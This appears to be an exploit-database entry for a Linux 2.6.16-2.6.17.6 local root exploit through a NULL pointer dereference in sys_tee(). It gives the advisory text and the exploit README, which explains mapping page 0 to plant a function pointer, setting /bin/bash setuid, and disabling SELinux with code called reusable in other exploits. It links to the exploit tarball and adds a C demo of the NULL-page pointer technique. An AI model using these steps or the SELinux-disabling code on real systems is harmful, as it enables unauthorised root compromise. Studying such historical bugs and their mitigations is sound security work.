source: https://www.securityfocus.com/bid/22823/info
The Linux kernel is prone to a local privilege-escalation vulnerability.
Exploiting this issue allows local attackers to gain superuser privileges, facilitating the complete compromise of affected computers.
Linux 2.6.16 -> 2.6.17.6 local root exploit in sys_tee()
------------------------------------------------------------
*proof that null ptr dereference bugs can be exploited*
------------------------------------------------------------
Bug in fs/splice.c was silently fixed in 2.6.17.7, even though
the SuSE developer who fixed the bug knew it to be a "local DoS".
Changelog stated only: "splice: fix problems with sys_tee()"

On LKML, the user reporting tee() problems said the oops
was at ibuf->ops->get(ipipe, ibuf), where ibuf->ops was NULL.

Exploitation is trivial: mmap a buffer at address 0; the 7th dword
of that page is used as a function pointer by the kernel (the get()).
------------------------------------------------------------
May need to run multiple times to catch the race.

Exploit does chmod u+s on /bin/bash and disables all LSM modules,
including SELinux.

Code involved with disable_selinux() in tee42-24tee.c should be independent
enough to be plugged into any kernel exploit where you have arbitrary
code execution.

Remember to use /bin/bash -p when executing the rootshell: without -p,
bash drops the setuid effective uid back to the real uid on startup.

This exploit is *NOT* stealthy. You'll have to do some serious work
to exploit this bug silently.
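What the "mmap a buffer at address 0, 7th dword is the get() pointer" step amounts to, as an added C example that is not part of the original exploit or the 29714.tgz tarball: it maps a page at address 0 exactly as the README describes, plants a function pointer in the get() slot of a fake pipe_buf_operations table, and then performs the same `ibuf->ops->get(ipipe, ibuf)` call the kernel made with `ops == NULL`. The slot order can_merge, map, unmap, pin, release, steal, get is assumed from the 2.6.17 fs/pipe definition (get is the 7th slot, which on a 32-bit kernel is the 7th dword at byte offset 24; the demo uses pointer-sized slots so the same index works on a 64-bit build); `demo_pipe_buffer`, `payload()`, `plant_fake_ops()`, `map_zero_page()` and `run_demo()` are my names. It does not reproduce the tee() race or the LSM-disabling code. The check a practitioner wants is built in: on any kernel enforcing `vm.mmap_min_addr` (added in 2.6.23, the mitigation that closed this whole NULL-page pattern for unprivileged users) the mmap at 0 fails with EPERM and the demo falls back to an ordinary page, so it runs either way and reports which path it took.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/*
 * Slot layout assumed for the 2.6.17 struct pipe_buf_operations:
 *   [0] can_merge [1] map [2] unmap [3] pin [4] release [5] steal [6] get
 * On the 32-bit kernels the exploit targets each slot is a 4-byte dword, so
 * get() is the "7th dword" (byte offset 24).  This demo uses pointer-sized
 * slots so the same index works when built on a 64-bit machine.
 */
#define GET_SLOT  6
#define DEMO_PAGE 4096

/* Minimal stand-in for the kernel's struct pipe_buffer; only ops matters here. */
struct demo_pipe_buffer {
    void *page;
    unsigned int offset, len;
    const void *ops;            /* left NULL by the buggy tee() path */
};

typedef void (*get_fn)(void *ipipe, struct demo_pipe_buffer *buf);

static int payload_hits;        /* how often the planted pointer was called */
static unsigned char fallback_page[DEMO_PAGE] __attribute__((aligned(DEMO_PAGE)));

/* Stands in for the attacker's ring-0 code; here it only counts invocations. */
static void payload(void *ipipe, struct demo_pipe_buffer *buf)
{
    (void)ipipe;
    (void)buf;
    payload_hits++;
}

/* Mirrors the crashing call in fs/splice.c: ibuf->ops->get(ipipe, ibuf).
 * With ops == NULL the pointer is fetched from address GET_SLOT * sizeof(void *),
 * i.e. from whatever the attacker mapped at page 0. */
static void kernel_call_site(void *ipipe, struct demo_pipe_buffer *ibuf)
{
    const get_fn *volatile ops = ibuf->ops;   /* volatile: keep the compiler from folding a NULL load */
    ops[GET_SLOT](ipipe, ibuf);
}

/* Zeroes page and plants handler in the get() slot.
 * Returns the byte offset the kernel will read the pointer from. */
size_t plant_fake_ops(void *page, get_fn handler)
{
    get_fn *slots = page;
    memset(page, 0, DEMO_PAGE);
    slots[GET_SLOT] = handler;
    return GET_SLOT * sizeof(get_fn);
}

/* The README's step: map a writable page at address 0.  Returns MAP_FAILED
 * (errno EPERM) on any kernel that enforces vm.mmap_min_addr (2.6.23+). */
void *map_zero_page(void)
{
    return mmap((void *)0, DEMO_PAGE, PROT_READ | PROT_WRITE,
                MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
}

/* Returns 1 if get() really was fetched through a NULL ops pointer from page 0,
 * 0 if mmap_min_addr refused the mapping and the fallback page was used instead. */
int run_demo(void)
{
    struct demo_pipe_buffer ibuf = { 0 };
    void *page = map_zero_page();
    int real_null = (page != MAP_FAILED);

    if (!real_null) {
        fprintf(stderr, "mmap(0) refused: %s (vm.mmap_min_addr), using a fallback page\n",
                strerror(errno));
        page = fallback_page;
    }
    size_t off = plant_fake_ops(page, payload);
    printf("fake get() planted at %p + %zu\n", page, off);

    ibuf.ops = real_null ? NULL : page;      /* NULL only when page 0 is really ours */
    kernel_call_site(NULL, &ibuf);           /* was the oops; now dispatches to payload() */

    if (real_null)
        munmap(page, DEMO_PAGE);
    return real_null;
}

int main(void)
{
    int r = run_demo();
    printf("payload ran %d time(s), %s\n", payload_hits,
           r ? "through a genuine NULL ops pointer" : "through the fallback page only");
    return 0;
}
```

On a modern distribution `run_demo()` takes the fallback path and prints the EPERM from `mmap(0)`; that failure is the reason this class of exploit needed a separate `mmap_min_addr` bypass after 2.6.23. Lowering the sysctl to 0 (as root, for a lab machine only) makes the same binary take the genuine NULL-pointer path.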
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29714.tgz